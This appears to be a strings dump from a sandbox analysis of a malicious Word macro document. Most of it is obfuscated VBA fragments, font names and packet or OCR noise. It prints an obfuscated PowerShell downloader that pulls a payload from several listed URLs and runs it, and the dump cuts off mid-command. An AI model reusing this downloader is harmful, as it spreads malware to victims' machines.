kwrhWEj#@hw
Ansi based on PCAP Processing
(network.pcap)
KXauB@PnztSb sIwr2812AEXAWYi.406964A(!mRWdwi + B' 22082HDcqNS54674@COQMIkGAC5998B@moBwJBE/PVScW`azHoV.OTMGQ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
kZIKj?CPYNFltZChqXwWYmMTzlPpSTnFXJhPTKOQXWjsc9GCzfiTIcNzub@jMTTLfuRYTB=YdojjizjmrKUSZjwDDYIrHiGKSsbTFVVZwcU;<zEjJNEOPmjTuHZzwOmCEKUaP@prJOaxJqTkJ8tooRWF-MijIaPjJtpEN`@MEuQEpopnvJQZzGUKZNoTjHDUcwnKTjbIYvziiWWzvliaMo.KNoBUtyitXCwuLmNfqrMoYHjw.asuJRvhkQsGjzmtvNktNDhIi(dcozBUzPZbsjwVMvlbKSfHVpSZJz,nrAbGIBRCZzjRRQjzjKYzbzzRuAUJdMUftiCROFcXalI2hCbcuThPfLBYlplTLNwatjaubnLrYN9jjsDzn=POwpri@/RKGTEAr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KzRFfwPKtUTfHzJjaiLI22/ PtwJJ'23409(iAhrf( 38849(cRsvk@85' pdFCz'27376'PzTi'RwIwnmA'ZIZwH#wQpJm("H2z% tes&&rHBCSAFllQp0k", 93198917csnbAkhSiib
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
K{mjZV<%:iZ.9q{x]GO>b6K[Q4_Z[KIvTSV7`Pg:1![q}A7s\xT3vK#aPb}~V<^vH,/PVDVh#J 4C_^-
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
l FUpIj (CcUBp / P MijjP65929Fix(SGBNvI)) + 95544 - CLng(TrYUkj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
L jTjDO.krMhQSnTBuUj93344A/zbozbAB&30534E/o TumDwE/10735YbhlC51901/ GZMaRE/34687A/mJmooB/ruGmcH@(sndOl@$IcSnzu
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
L#')h((((((((k~ e"2y~mYMc+#g+p;+|8wk-.'",~dl9e-s
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
l]Z-<_Q;K?G<ErVgM|S|Y)E\O` <}yrt)msH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
LanguageList
Unicode based on Runtime Data
(powershell.exe
)
LastPurgeTime
Unicode based on Runtime Data
(WINWORD.EXE
)
Leelawadee
Unicode based on Runtime Data
(WINWORD.EXE
)
Levenim MT
Unicode based on Runtime Data
(WINWORD.EXE
)
lhupX,(bLzFvh@YwOzvi`67115(lmVnV79349AZufjfW(25988lSDEfj 29026@sPkmLT5558jrDjvIT`iwAlCaLshKND;.EMZQ9tm('+'C<c4udEgodrp/;gJadmi/@wt.m Dsdo@CD>9ada>1928A1a>9D10! BTLEdriDVWs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
LHzQv(cDcoatdbQwX`33270ei`QLQJpc2_6azzktb372vOmRzBuA8974O tzOQae981101WdTavv HFwHEd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
liFVG`4p59U mGzYp
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ljaakr(7lH{@PqX n Q35|842sP9 D,0D000( txen.xsadastnAmWp1BSN;tn@eilCbeTW.teN.mU tsyS NCtf7q[969w1w$19BALOsXhqPCiPoS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
lKuOr(zhISt / MKOVLA95319Fix(lQzuPm)) + 9692 - CLng(kbHukTC
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
llfVuRfJG$wTBZ & SoEkSiq`w2w2Mp8d8P~81"b2oHLT! ZXTil@vpWmiCwdS$nWTYe/ 08889a(FSQKd74VTfGrr75vKfZX!\3661pXwL0uRahjrcLMvBQ~wMwD@Y= aWihNmpncb%(jNfBK}PVwSa$1
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
lLkwn!AOWw$IzikjHkvIAYDil965CwHiv8840uwaEO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
LmbsHJHpw`dEsFL84$E,HuVaA@`U9fsa@A>AF\(hmU3rUerof@Qe`~+J@QOmU9+0xpe8.8'+'U9JQO(` BSNLAx1,f", 35600 + 2 -$193()
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
LnkDzF1DLaT nlZBM 51795pCbXVt87P.UGvEzU64382vlRXI6315#MihC e78281i0VwzaIMNiMmOLC QVHch1mi(YJYP!}!4iJh15K0}`EzPVu1JrAIi
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
LnYFkaSDXT6JwzGSN45SVCTUH5866jEZji6l4570@doBqlsp1392avOmwfcG62350AmjAqJuDEGXj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
lopfKUmRhiW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
LrlIjA{`97175AtuAjFw#328aGKzJHA?37268BNjkZ`85160oDSdBW574@wmPGJ&tvzOFR!J3PPirZ(@vzDYBBcnSkfdAWrI_RRiVUOhoCuJ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
lS&zjKEQ", 58872 + 6 -177)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
lSDEfjsPkmLT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
LtUlnsAJbu4aw0"`Batoavki
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Lucida Bright
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Calligraphy
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Console
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Fax
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Handwriting
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Sans
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Sans Typewriter
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Sans Unicode
Unicode based on Runtime Data
(WINWORD.EXE
)
luSqQ(hGBqHAPktXGGp908138p(YIDSvS432spsVMN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
LYpRJHtwuOCsR'lmGqOdYnIPMXwERnXfNKqTFaTmTrGNPNuETMhphwsSMJh5cIqZlm:UdBwKk;zIkTKiQYhMNFsQkPKcdKiabQXAhi\RvCwZNlBhCkjjjA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
m-1p?7Fn"R8IG^{=Im=2=*Rk(?SxIba\]oM1a{
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
m0u`&a15 t9AS_jvZxz<oIT` QG-495|j,2 9U]X6>Jt5DRa.%Pa2+9EnnM>W9"*nTdP''.G=]EdwMF9;7q+ZK/_sN~j$O'bzK55[ibT8_9&CarO]]y3e7l|1
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
M_(#.mm`0][<$c) p}
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
m____qJ_,,
Ansi based on Image Processing
(screen_0.png)
m_cr0c0ftw0rd
Ansi based on Image Processing
(screen_8.png)
M_crasaï¬
Ansi based on Image Processing
(screen_8.png)
Maiandra GD
Unicode based on Runtime Data
(WINWORD.EXE
)
Malgun Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
Matura MT Script Capitals
Unicode based on Runtime Data
(WINWORD.EXE
)
Max Display
Unicode based on Runtime Data
(WINWORD.EXE
)
MaxFileSize
Unicode based on Runtime Data
(powershell.exe
)
Meiryo UI
Unicode based on Runtime Data
(WINWORD.EXE
)
MFC LongBinary
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Micrasoï¬
Ansi based on Image Processing
(screen_4.png)
Microsoft Himalaya
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft JhengHei
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft New Tai Lue
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft PhagsPa
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Sans Serif
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Tai Le
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Uighur
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Word
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft YaHei
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Yi Baiti
Unicode based on Runtime Data
(WINWORD.EXE
)
MIJjjFE76 a~vFlf!55660sipmN12666zEHndD%CXFvVw@`zZMOiaE2cs.AbRp1dc/ k2276@z+ Eb, E1A
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
MingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
MingLiU_HKSCS
Unicode based on Runtime Data
(WINWORD.EXE
)
MingLiU_HKSCS-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
Miriam Fixed
Unicode based on Runtime Data
(WINWORD.EXE
)
mjjFqoABHT9rZHTparPdJvK&hzufIccjicwvQCVTvEltvaDKLpXGWTEVrGVwwLviU9zMIplGCTzwTmHSSGZZwzVVouizwLfhyKwjYaispmWAVclnMCZF.QIUQRhCXnSmDbauscr?dUzMskJGcTMIIqdm`yihjiwg>MRJzN4AGiAQFv@qniMKjAkOljlzuumP3mzSzIOMLLrDvVEVZIzZ%aLzqLj_@bAVqVDvuMZDGfqsASqZqVzNBiZzPpcb
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
mKsmdk(rAuNX$nzchF@S78(dRzdSF(50094(fhtuJh) 50704QIIpcO6(d@npMnBiE)56547A)dBAVNP9YKaLS)jHvjj0vwYR%ewSDqYpBsz022A^63g@SOZMI@ZwTFP!pdsmAg(EORIhdBoki3623A9MmUan97&SDjJv 67199ZqjYs 18958@1nBFrH818ccLpDMBXVCFM hLafPDiICH@cizhA(ZVYJJ@iooBrj503496IMhNABB8`(FEV0VdmW"3743BcbSBH358* fICRB69862A0JBrba GQzfHaVjISkso=%pzUCKIcbi`07 sb, E6@b DzuXnTMNjpp
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
MmVDl = okEME
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Modern No. 20
Unicode based on Runtime Data
(WINWORD.EXE
)
Module=FPAOsHRZpzGcVH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Module=HULSuHBvj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Module=izosJmiC
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Module=uIpNwjvi
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
mOLCQVHchWCaEzPVuALJrAIiXXwqspnVpjbazwDBjIKjwYwMPudiNk%DaSUXLXWpNuE5IbUTXatfCRbBAvjcpHKXnjnIiLzzOuIPasIHJlOt99SpjiAWLvSSrpmjzCslVnhcmZphNtbOzpzuznHTbW|wTHZw?PTwftwZEOuSw4VZVdkizOYkKwROOj{hnuvlcVANUjsfD7ipOISFujlcdmzjHjnlb ZdkkwjhwiDNvc>AUHSGjzXjPVbXpLpjSrdqTnjEmbBKoRzDlZ&wUPXINSNjdCXdnfXI=JcSJhokzZTaTtoTQoYMlvsI|kjVEQ-uAmZuYFpnLYsCCjvrwFblkqIjPwtjUtvIFlBNhcYbioIKzD(miJohQuRRRrEODSYljbmOvZAz4irjzQBW7ozbPwKfUtiMOr`aVQkudIrwmP7AqpjdoKRdhJtarqYwXcqnjriqJizQUq1XsSXzHNazbhVZKV(PDnCk9OVIHHsnBaUqGrtdawGsRKhJbMNkGYdQPsztPnGjhANTtiBGLkmj?mKsmdk@rAuNX_3nzchFdRzdSFfhtuJh\QIIpcOnpMnBidBAVNPYKaLS6jHvjjvwYR$SOZMIVZwTFPsJpdsmiCbEORIh;dBokiMmUanSDjJvkZqjYsnBFrHalLpDM*XVCFMthLafPwDiICHASizhAcZVYJJZiooBrjIMNAB.VVdmW6WcbSBq_fICRB&*JBrbaCzGQzfHbaVjIS~DzuXnTMNjppvCcDLj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Mongolian Baiti
Unicode based on Runtime Data
(WINWORD.EXE
)
Monotype Corsiva
Unicode based on Runtime Data
(WINWORD.EXE
)
MoolBoran
Unicode based on Runtime Data
(WINWORD.EXE
)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Ansi based on PCAP Processing
(PCAP)
mrhLjjA(wzprBCjMDBA408721(qHCChMB9783RjzkTE(284inaNLM0nriGSF(21325A(sBqBn@B(pfiWkN@(PXzObwjG$GPzTBfcA%<tcejb9oF-@QOwkBegAb`?U9B.$ =d UYYMADx1g;moIlC468N7A, 150@QqHin,PbfNDF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
MS Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Mincho
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Outlook
Unicode based on Runtime Data
(WINWORD.EXE
)
MS PGothic
Unicode based on Runtime Data
(WINWORD.EXE
)
MS PMincho
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Reference Sans Serif
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Reference Specialty
Unicode based on Runtime Data
(WINWORD.EXE
)
MS UI Gothic
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
MsfRK/WCioqJ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
MSOBALLOON
Unicode based on Runtime Data
(WINWORD.EXE
)
MsoCommandBarPopup
Unicode based on Runtime Data
(WINWORD.EXE
)
MsoHelp10
Unicode based on Runtime Data
(WINWORD.EXE
)
mspim_wnd32
Unicode based on Runtime Data
(WINWORD.EXE
)
MSWordDocWord.Document.89qOh+'0pX@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
MT Extra
Unicode based on Runtime Data
(WINWORD.EXE
)
musHwkwosIUZkVOXN0dowlFKYHbOaljiLscpbMNpcaOz20uQAuAmoDYXLrlIjouAjFwm-KzJHO.HBNjkZoDSdBW,@wmPGJtxvzOFRiO_PPirZ,evzDYBB.cnSkfcdAWrIJ-RRiVUOhoCuJntlzjqEHIidZasYaiA;QiEamf7iXbizsDDBrJJsuAObdUbwaH6AmiVCTlHCqcIEXXjJUMqJZ7rHDzmAXnOYfpwpDXFYRwumRnjcEwwcDDEGY$3RIwBUUQAGBSf}kBGFzFzQ;cmTiqWtmzRbzwtSw6LKWCdSxwwEBaZWiSdHL~GklmXvILhIsiJSQQFYzHwnuQGVdmbTbo[tjvPSsFLomXsaWGNNF7DaaMUlcoks2UWAwMrbIBWXYrRFOjSpDzOMTJfACfZjFModule1bFPAOsHRZpzGcVH8VIAJOCvBwfLOIz~qwplPPNVahnvAIjza8whWYZq=HNCjjszwQqFr6nabaH\qvNnqLZPvSI]mtpiUWBrsri+ZiwzPqNMnTF+JfZBvjOwBhmZmWzwDVQskaSfPwwZkKabqwEzLRKTDzOJzACQuzqQLzwzD=csvhfTQZIMrH<qREbSidtsimY=KURAvirUEHB1LbpUXXnzllLrduGXL`wZNiUazAUdftMMvPYQVwQpJmwSCNOAHBUjPjKSfOZzj SwdQGprciCkQsHkajsTuRKivMXCkzXGmHZwrS$wAmLvnFNmzBLHsMznz1LKiaZZ04lhupXAAbLzFvhYwOzvikllmVnVJZufjfW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
MxgU[S\I'C(r+mt9(hE:6g<~VhAl9EhS_jVZzz<<oIT` Q@^}kK
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
my::}3|}KnOIB+xN/\-0!Jv=+`pT]b/];Z .We4LziF%$ro:|?{(fE44o(LR{yMkx_#KImAL}+g=)5=P<lTI54svr`\M}
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
M~B546;13nl6Ax8!qcihtl56dXsasq?UEkw+kksEfi0xpYaJ8:oVM/P !u^%q*cM_R,mWP}[$AT2R09<cMnM7$.yiO{kwv5JX+7/msA 5k{+,/&0Y3@9pVeSi4 X69gX_>uw~iU_8+ u/AsOg,1Lgpd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
n RmJrP(G iswwXjiIbVp3910UOd[676B8[GAQm0F2KPiid[97`8* AZjUvj3856$nSzqYnAuQfrA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
n!Lr1Z9?57&:
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
n0%Rn0MOn
Ansi based on PCAP Processing
(network.pcap)
n6y]Q^c_7/l?_<?o}A$)QE{gEv,Yo-NU$vjF}@+O VYcI#?k_!O5aw?5|J
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Name="Project"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Nav_9at_anPan,
Ansi based on Image Processing
(screen_8.png)
naX p rX'biNAttribute VB_Name = "HULSuHBvj"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
NcwW<jQLB"Q`453KAkvMQT45)BfwwNtl440
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
NetUICtrlNotifySink
Unicode based on Runtime Data
(WINWORD.EXE
)
NextUpdate
Unicode based on Runtime Data
(WINWORD.EXE
)
Nfg7W`XyGa\Tvv:q.E8Fc}~[OSmkV|;^ccN>u:fkxTMfla{n?AW#XNOM5$U
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Niagara Engraved
Unicode based on Runtime Data
(WINWORD.EXE
)
Niagara Solid
Unicode based on Runtime Data
(WINWORD.EXE
)
nivcJPOOZEWj(wsizGGz XnRFlUtKUOhoVJBKz3jUKVupizHSL5MpqpAEqoZpJpFww_tzRDXI(yzjUGzzWGvvDhCpdFYGwLXIPdYbC^JYhLbUvCcJYtETLsIhUlLpj7sYvEijYAzLJjzuJVdCm~EKviNuMkUHYMHEvAKsjKbXHXWWtYaRY?{rYDwioDnOFX&!ZdQDHoKiRYS{tqRzSMBJkOr%#RQYjNBdEVcbpbiimJpqmJNuq?jcrbiTNOmwQJVoljLA&WbPBQ3$LomERSkMttXKupLfisAziRQAMi#CdnZJu[CFVATHXnFCzKisowcuDQHVOONCUmfvPursaqULNDCWm{jKiuXmwzmlkiwpYVvMfNjtT|pFnzHYzfcPD?HzznVtLrZE_zzRmo;HcmqVGRMISslA?aKWzDdOsDVR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nJ;e/aS.+
Ansi based on PCAP Processing
(network.pcap)
Nk0&Ny0f0h
Ansi based on PCAP Processing
(network.pcap)
nkeU`ALm[^'my;3s6zs9
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nKOU!gaiJSbwoaz(lqnZqgYBMAJ8822gdRtbEz3
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
NmdmHtDcoQj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
NNOWpL(qZHut cLBbdH613/ !1R MtVai7968F1sbiTVE205,A@GzPKiV7251APsifrJe128261`pcMRA+v KWnwz@rOipTk`wEtQfJ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nu/WguY`K
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nubQUzkjGH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nuYal bwoln@!UjjkM'26A>ZijPM487179=IHHjw@.1578OfIrSS 18883AfzaJnAf70624A=fZXYiAQoLwh'l SXBiq'mAmbBI
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
o lOqKE(HawjbinabA(9159E(LtbczAB(4882AF(umErlE(94178mHzmw72278!(KYUB(27408(oPAlo(JmtKfQ@(NUjTpW`HKioO3jwUfYsdMLdmXo%!!%@Isoh8W39f3`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
o qijIN(DfjNjKAoOCr54910(bvPcwB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
O(u-Nn0_0
Ansi based on PCAP Processing
(network.pcap)
O(u-N~0_0o0
Ansi based on PCAP Processing
(network.pcap)
O(ug0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
O(uW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
O0S0h0k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
o]Eulyw9=(\dL\bx_G~#%H{V?Fp++@,=<+}ta08<w?
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
OCR A Extended
Unicode based on Runtime Data
(WINWORD.EXE
)
ODBC Level 2
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
ODBC32.DLL
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
OfficeTooltip
Unicode based on Runtime Data
(WINWORD.EXE
)
oG;e0ZS.,t
Ansi based on PCAP Processing
(network.pcap)
oGZ[@()Nw
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
OHHH3l~n!w+-B:k]wU[<k\BaO5g'`_OE}y;mWT1Y$ZWK2}>N%v#%b@`cwR2c9Ti
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
OItatGYJQ(XFkS;mWGdhRYqIlppZTSAl (FXSSdJRjPQ65695ZwEDWb"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Ok01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
Old English Text MT
Unicode based on Runtime Data
(WINWORD.EXE
)
On Error Resu@Next
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
On Error ResubNext
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ONltA(BIPNnAAnZXi1440%kKJrdjB5733a
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Options Version
Unicode based on Runtime Data
(WINWORD.EXE
)
Or ^MXX mX X'icddrpmoHspCiu+]4[eMOhSpCi'+'u (.ja6 )63]RAHC['+',mU9Ax'+'1mU9 ecalpeRC- 93]R'+'AHC[,)47]RAH'+'C[+18]RAH'+'C[+97]RAHC[( '+' ecalpeRC-29]RAHC[,'+'mU9x'+'91mU9 eCAlpE'+'r'+'- 43]RAHC[,)211]cRyRyRyRy$' $'" ( *t ,g .xXX 0p] 2X 4 6X'& :'8 > @>a BTA DXX F HpSX J LX'<E,HuVaA9+m'+'U9fsamU9+mU9AxmU9+mU91(hmU'+'9+mU9cmU9+mU9amU9+mU9ermU9+mU9'+'of'+';)JmU9+mU9QOmU9+mU9e'+'JmU9+mU9QOmU9+mU9+JQOmU9+mU9xmU9+mU9emU9+mU9.mU9+m'+'U9JQO'+'(mU9+mU9 +mU9+mU9 BSNmU9+mU9Ax1 +mU9f$'N R'P V X Z
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
otoZASdNzI
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
OuvSK#_fMG;QC:\:+McK5]yQbE'w8#5`4}BhE+)*pN,3:A-=/|A=7JCHrW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
OX[g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
OX[k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
OX[W0f0CQn0
Ansi based on PCAP Processing
(network.pcap)
OX[W0j0D0
Ansi based on PCAP Processing
(network.pcap)
OX[W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
OX[W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
oXmdLMdsYfUoN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
P 6 ( V
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
p FnzHY(zfcPDHzznV4@7A( tLrZEB877ABzzRm63@HcmqdVG@(53u@(R MISslE(248@2aKWzDdOsDVR@(QMWPujSG$dB2UMNJ=%VHTUTCEY0Cd.d18907t, 1PO qaWVANwAPcufQmLA(mRqbddOYz7170dlCVivB4`q"pSiKHC@91457iwGrC5
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
p0F%WINDIR%\system32\stdole2.tlbstdole
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Pa9,W_dth
Ansi based on Image Processing
(screen_8.png)
Pag,Layaut
Ansi based on Image Processing
(screen_8.png)
Palace Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Palatino Linotype
Unicode based on Runtime Data
(WINWORD.EXE
)
Parchment
Unicode based on Runtime Data
(WINWORD.EXE
)
PbjQw6WXmf4828MQnoGBJB9653PSXZ1"#2796IkwBO
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
pbxdrPb8b@8d@`P`bh`8@dHdD hbpfH8d@df dbXb`bbxb `THbPb( d `!dh!!!b!X"#`#h#"p#x#d##b#X$h$ Z'X ^ `I bF dlXX f hzX j lX'\00o`p p'n t vt$ x zTXX | ~fX X'r '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
PDHjB(BEhREOUDhBh9916e<mGlot'264f<kZIKj' <6PYNFl289AChqXwW<35941AkmMTzlP%( STnFXhPTKOQXWjsc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
pDpppRciIIYjrLi;,474Ep^S^m^ojf@", 54636 + X4 -XH7H)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Perpetua Titling MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Pi-'-lpli-nt
Ansi based on Image Processing
(screen_4.png)
Pj-\nX;WEE+Z{sglV8DRMu2}Y:E-\
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Plantagenet Cherokee
Unicode based on Runtime Data
(WINWORD.EXE
)
plhcps6ZKqiTAkA257267IoLNd!8326"(UUUPgrUSpq
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Plj`AeqGIUflpbmDJCqL`qPpqwppCz76067@SczCIn3C7BOPwquPp@51rtQrEHB58ot.rDdqrBi`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
PMingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
Poor Richard
Unicode based on Runtime Data
(WINWORD.EXE
)
powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 